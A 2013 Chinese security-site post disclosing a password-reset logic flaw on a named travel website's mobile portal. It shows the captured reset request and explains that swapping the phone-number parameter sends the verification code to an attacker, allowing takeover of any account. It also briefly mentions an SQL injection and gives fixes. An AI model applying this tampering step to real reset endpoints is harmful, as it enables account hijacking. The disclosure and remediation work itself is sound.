频道栏目
首页 > 安全 > 网站安全 > 正文

畅图网逻辑设计缺陷导致可修改任意用户密码及修复

2013-07-11 08:57:47            作者:带馅儿馒头
收藏   我要投稿
存在问题的站点为“畅途网-3G炫彩版-QQ手机浏览器合作版”!

 

 

域名:qq3g.trip8080.com

 

 

 

1.点击忘记密码;

 

 

2.输入需要找回的用户名;

 

 

3.畅图网在注册的时候都需要输入手机号码做验证,所以每个用户都绑定了一个手机号码,直接使用手机进行密码找回;

 

4.点击手机找回密码并抓包;

 

 

POST /user/findPwdMobile.htm HTTP/1.1

Host: qq3g.trip8080.com

Proxy-Connection: keep-alive

Content-Length: 25

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Origin: http://qq3g.trip8080.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://qq3g.trip8080.com/user/findPwdType.htm

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Cookie: ...

 

mobile=135........&email=

 

5.这里将“mobile”参数值修改为我们需要为攻击者的手机号码“136.......”并提交;

 

6.这里未校验手机号码是否归属该用户,导致攻击者成功接收到验证码,填入验证码成功来到密码重置阶段;

 

 

7.填入密码即可!

 

 

 

另外,发现存在sql注入,post请求能够get方式提交,对用户输入过滤不严呀,只是利用不易!

 

订单查询;

 

订单支付:

 

 



 

修复方案:

1)严格校验用户身份!

 

2)过滤用户输入!

上一篇:爱丽网的一个没有什么人用的功能平行权限漏洞
下一篇:php本地包含的利用
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站